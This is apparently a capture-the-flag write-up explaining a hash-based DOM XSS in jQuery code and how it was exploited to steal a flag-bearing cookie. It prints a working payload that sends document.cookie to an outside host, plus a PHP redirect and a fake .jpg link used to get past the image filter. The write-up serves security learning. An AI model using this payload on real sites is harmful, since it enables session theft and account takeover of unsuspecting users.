Introduction
The goal of this challenge was to grab a cookie which contain the flag, but we don't know it yet.
The target website had a form to submit pictures links.
Find the vulnerability
After a quick look at the source code of the page something come obvious, there is a XSS vulnerability caused by jQuery code.
$(window).bind( 'hashchange', function(e) {
$('.image').hide()
tag = window.location.hash
$(tag).show()
});
tag = window.location.hash
$(tag).show()You can trigger a simple alert by adding some code in the url.
http://54.86.199.163:7878/#<img src=x onerror=alert(1)>
Exploit
As we said earlier the goal of this challenge is to grab a cookie on the target machine. We are going to use the XSS vulnerability to do so.
This payload will bounce the target to the attacker website with the cookie as argument.
#<img src=x onerror=location.href=("http://wiremask.eu/test.php?c="+document.cookie)>
The problem is we can't submit this url because it is not an image. We created a PHP file http://wiremask.eu/test.php which redirects to our XSS.
<?php
header('Location: http://54.86.199.163:7878/#<img src=x onerror=location.href=("http://wiremask.eu/test.php?c="+document.cookie)>');
?>We also created a Apache rule to redirect http://wiremask.eu/test.jpg to http://wiremask.eu/test.php.
Exploitation
The last step was to submit the fake link http://wiremask.eu/test.jpg.
The target will hit http://wiremask.eu/test.jpg which in fact is http://wiremask.eu/test.php then it will be redirected to the payload
#<img src=x onerror=location.href=("http://wiremask.eu/test.php?c="+document.cookie)>
Finally the XSS will redirect the target to http://wiremask.eu/test.php?c with the cookie as parameter.
You can read the flag in your Apache logs or customize your php script to save the cookie in a file.